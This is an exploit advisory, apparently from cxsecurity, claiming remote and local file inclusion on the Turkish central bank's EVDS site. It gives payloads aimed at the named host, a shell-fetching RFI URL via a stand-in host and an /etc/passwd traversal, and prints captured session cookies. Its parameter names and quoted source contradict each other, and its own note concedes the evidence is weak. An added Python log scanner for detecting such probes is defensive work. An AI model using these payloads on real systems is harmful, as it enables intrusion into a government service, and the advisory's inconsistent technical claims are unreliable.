Türkiye Cumhuriyeti Merkez Bankası RFI/LFI/RCE Vulnerability (CWE-661)

2020.02.24
Author: Gaddar (TR)
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-661

Vulnerability Author : Gaddar
Team : SiyahBayrak
TeamMates : Deadly-Warrior ~ StabilBey ~ Diablo
Vendor HomePage : tcmb.gov.tr
Vuln. URL : https://evds2.tcmb.gov.tr/index.php?/evds/serieMarket

Description :
The page parameter of index.php is passed to a PHP include() without validation. A remote URL supplied in that parameter is fetched and executed on the server (remote file inclusion, giving remote code execution), and a traversal path in the parameter reads arbitrary local files (local file inclusion). The site holds official (legal) data of the bank. The site is written in PHP and its include logic is vulnerable to LFI/RFI. The page is filed under CWE-661; the weakness as described corresponds to CWE-98 (PHP remote file inclusion) for the remote case and CWE-22 (path traversal) for the local read.

Payload : index.php?sayfa=
Example (RFI) : index.php?sayfa=https://target.com/shell.txt

Vulnerable source (index.php, path elided as published) :
<?php include ('data/$home/.../index.php'); ?>

Payload URL (LFI) : index.php?data=../../../etc/passwd

PREVIEW (captured request headers) :
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: keep-alive
Cookie: BIGipServerEVDS2_HTTPS_POOL=1913432256.47873.0000; JSESSIONID=C7CA3B3E8343A73D36E9E01A25A7EF92; TS013c5758=015d31d691e014116d0f047d3655d2145c0949f6d903ddb8f7d3cba23d3804da926581ee0c2deb034ed073ab3b5fe39632f1879f7c295ca0b2040dcbf0c2bdccddb4e086d9a3bd63aa0aa6e3c227bca89adcfa9a7f
Host: evds2.tcmb.gov.tr
If-Modified-Since: Fri, 17 Jan 2020 13:02:06 GMT
If-None-Match: W/"105932-1579266126000"
Referer: https://evds2.tcmb.gov.tr/index.php?
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36

Note on the capture : the headers above belong to a same-origin script fetch (Sec-Fetch-Dest: script, with If-Modified-Since/If-None-Match revalidation), not to a request carrying either payload, so they show the target's session and load-balancer cookies but do not by themselves demonstrate the inclusion. The JSESSIONID cookie and the W/"size-mtime" weak ETag are the defaults of a Java servlet container rather than of PHP, so anyone reproducing this should first confirm that the sayfa and data parameters are actually consumed by a PHP include on the server (for example, by checking whether a traversal value changes the response) before relying on the RFI payload. Remote inclusion additionally requires allow_url_include=On in php.ini, which has been off by default since PHP 5.2; the local-file payload does not depend on that setting.
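Detection logic for the two payload shapes shown above (a remote URL and a traversal path in an include parameter), as an added example that is not part of the original advisory: it scans constructed access-log lines (not real tcmb.gov.tr traffic) with Python's standard library and flags parameter values that look like inclusion payloads, including the percent-encoded, null-byte and php:// wrapper variants an attacker would try next. The parameter names sayfa and data come from the advisory; the IPs, timestamps and sample requests are made up.

```python
"""Flag file-inclusion probes (LFI/RFI) in web-server access logs.

Added example, not part of the advisory: the parameter names sayfa and data
come from the advisory; the log lines, IPs and timestamps are constructed.
"""
from __future__ import annotations

import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed combined-log-format lines, not real traffic from the target.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Feb/2020:10:01:02 +0300] "GET /index.php?sayfa=home HTTP/1.1" 200 5120
203.0.113.5 - - [24/Feb/2020:10:01:09 +0300] "GET /index.php?sayfa=https://target.com/shell.txt HTTP/1.1" 200 812
203.0.113.5 - - [24/Feb/2020:10:01:15 +0300] "GET /index.php?data=../../../etc/passwd HTTP/1.1" 200 2048
203.0.113.5 - - [24/Feb/2020:10:01:21 +0300] "GET /index.php?data=..%2F..%2F..%2Fetc%2Fpasswd%00 HTTP/1.1" 200 2048
203.0.113.5 - - [24/Feb/2020:10:01:30 +0300] "GET /index.php?sayfa=php://filter/convert.base64-encode/resource=index.php HTTP/1.1" 200 9000
198.51.100.7 - - [24/Feb/2020:10:02:00 +0300] "GET /evds/serieMarket HTTP/1.1" 200 30000
"""

# Pull the request line ("METHOD target HTTP/x.y") out of each log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators that a value is trying to steer a file-inclusion parameter.
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")          # ../ or ..\ segments
REMOTE_RE = re.compile(r"^(https?|ftps?)://", re.IGNORECASE)   # RFI: remote URL
WRAPPER_RE = re.compile(                                        # PHP stream wrappers
    r"^(php|data|expect|phar|zip|glob|compress\.\w+)://", re.IGNORECASE
)


def classify_value(value: str) -> list[str]:
    """Return the LFI/RFI indicators found in one query-parameter value.

    The value is decoded twice on top of the decoding parse_qsl already did,
    because double-encoded traversal (..%252F) is a common filter bypass.
    """
    decoded = unquote(unquote(value))
    hits: list[str] = []
    if TRAVERSAL_RE.search(decoded):
        hits.append("traversal")
    if REMOTE_RE.match(decoded):
        hits.append("remote-url")
    if WRAPPER_RE.match(decoded):
        hits.append("php-wrapper")
    if "\x00" in decoded:
        hits.append("null-byte")
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each request line and report parameters carrying inclusion payloads."""
    findings: list[dict] = []
    for line in text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            hits = classify_value(value)
            if hits:
                findings.append({
                    "ip": line.split()[0],
                    "path": parts.path,
                    "param": name,
                    "value": value,
                    "indicators": hits,
                })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['path']} {f['param']}={f['value']!r} -> {', '.join(f['indicators'])}")
```

To use it on a real log, call scan_log(open(path).read()) and feed the findings to whatever alerting you have; the regexes are deliberately loose (any parameter, any path) because the advisory shows two different parameter names on the same script, so filtering on a known name would miss the second one.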


Copyright 2024, cxsecurity.com